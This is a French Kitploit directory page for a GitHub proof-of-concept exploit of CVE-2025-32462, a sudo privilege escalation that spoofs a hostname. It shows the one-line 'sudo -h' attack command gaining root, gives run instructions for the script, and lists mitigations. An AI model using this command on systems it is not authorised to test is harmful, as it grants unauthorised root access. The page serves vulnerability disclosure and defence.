Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-32462-Exploit — PoC exploit pour CVE-2025-32462, une élévation de privilèges sudo via usurpation de nom d'hôte. Démontre le contournement des restrictions basées sur le nom d'hôte pour obtenir un accès root sur les systèmes vulnérables (< 1.9.17). | Kitploit
Outils/GitHubGitHub/cybersentinelx1/cve-2025-32462-exploit
Escalade de PrivilègesAnalyse des VulnérabilitésExploitationTests d'IntrusionApprentissage et ÉducationLabs et Pratique
GitHubcybersentinelx1/cve-2025-32462-exploit

CVE-2025-32462-Exploit

PoC exploit pour CVE-2025-32462, une élévation de privilèges sudo via usurpation de nom d'hôte. Démontre le contournement des restrictions basées sur le nom d'hôte pour obtenir un accès root sur les systèmes vulnérables (< 1.9.17).

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Voir le dépôt
11il y a 1 anPas encore vérifié

CVE-2025-32462-Exploit: Matrix-Sudo Escape

Élévation de privilèges par usurpation du nom d'hôte (CVE-2025-32462)

« Tu prends la pilule bleue... l'histoire s'arrête. Tu prends la pilule rouge... tu obtiens root. »

Description

Cet exploit démontre une vulnérabilité d'élévation de privilèges dans sudo (CVE-2025-32462) où les restrictions basées sur le nom d'hôte peuvent être contournées à l'aide de l'option -h. Le PoC crée un environnement utilisateur restreint, puis s'en échappe en usurpant un nom d'hôte présent sur la liste blanche pour obtenir un accès root.

root@kitploit:~
[user@matrix-node]$ sudo -h zion-core bash  # Spoof whitelisted hostname
[root@matrix-node]# id                          # Got root on wrong hostname!
uid=0(root) gid=0(root) groups=0(root)

Détails techniques

  • Versions de sudo vulnérables : < 1.9.17
  • Vecteur d'attaque : Élévation de privilèges locale
  • Défaut principal : Contournement de la vérification du nom d'hôte via le paramètre sudo -h
  • Impact : Les utilisateurs restreints peuvent obtenir root sur des systèmes mal configurés

Utilisation

Cloner le dépôt :

root@kitploit:~
git clone https://github.com/cybersentinelx1/CVE-2025-32462-Exploit.git
cd matrix-sudo-escape

Rendre exécutable et lancer :

root@kitploit:~
chmod +x matrix-sudo-escape.sh
./matrix-sudo-escape.sh

Suivez les invites interactives pour démontrer :

  • Détection de la vulnérabilité CVE-2025-32462
  • Création d'utilisateur
  • Configuration de la restriction du nom d'hôte
  • Exécution de l'exploit
  • Nettoyage

Protection

  • ✅ Mettez à jour sudo vers v1.9.17+
  • ✅ Évitez les restrictions sudo basées sur le nom d'hôte
  • ✅ Utilisez plutôt des politiques sudo basées sur les groupes

Légal

Uniquement à des fins éducatives et de recherche. À utiliser uniquement sur des systèmes que vous possédez ou pour lesquels vous avez l'autorisation de tester.

Télécharger l’outil